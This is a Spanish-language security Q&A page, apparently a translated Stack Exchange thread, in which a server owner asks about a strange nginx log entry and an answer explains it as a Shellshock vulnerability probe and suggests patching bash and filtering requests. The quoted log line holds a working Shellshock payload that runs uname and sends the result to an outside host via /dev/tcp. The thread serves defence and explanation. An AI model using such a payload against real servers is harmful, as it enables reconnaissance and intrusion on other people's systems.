Comprender una solicitud HTTP sospechosa

Navega tus respuestas
2

Al depurar problemas en mi servidor, revisé mis registros con frecuencia. Aquí hay una extraña que he encontrado, que parece un intento de ejecutar algo en mi servidor. Estoy usando nginx en Ubuntu 14.04. A continuación se muestra la entrada de registro: 

xxx.xxx.xxx.xxx - - [07/Apr/2015:02:15:05 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 400 172 "-" "() { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80"

La solicitud de ruta de acceso de /cgi-bin/test.sh y el campo de agente de usuario () { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80 me parecen muy sospechosas.

Supongo que esto es ejecutar algo en el servidor (que afortunadamente no está allí), y tratar de que exponga la información de mi sistema y enviarla a través de TCP a la dirección IP del solicitante, aún no tengo nada que analice los registros).

  1. ¿Qué intenta hacer esa solicitud, tanto en la ruta como en el campo Agente de usuario?
  2. ¿Ha hecho algún daño al servidor?
  3. ¿Qué puedo hacer para reducir el daño causado?

Gracias de antemano.

    
pregunta Kung Pao Chicken 07.04.2015 - 02:50
fuente

1 respuesta

3

Parece que alguien está probando su máquina para ver si es vulnerable a la vulnerabilidad de shellshock .

Esperan que el comando se ejecute contra el shell y que la respuesta les será devuelta. En este caso, están tratando de ver qué sistema está ejecutando, lo que probablemente ayudará a elegir los siguientes ataques si tiene éxito.

Debes asegurarte de tener la versión parcheada de bash o usar dash . También es posible que desee implementar reglas de firewall o reglas de proxy para filtrar las solicitudes que incluyen la cadena de respuesta de shell, ya que probablemente sean direcciones IP maliciosas.

    
respondido por el Eric G 07.04.2015 - 03:00
fuente

Lea otras preguntas en las etiquetas

Implicación de seguridad de exportar clave privada ¿Por qué Facebook y Microsoft le hacen ingresar un código al restablecer una contraseña?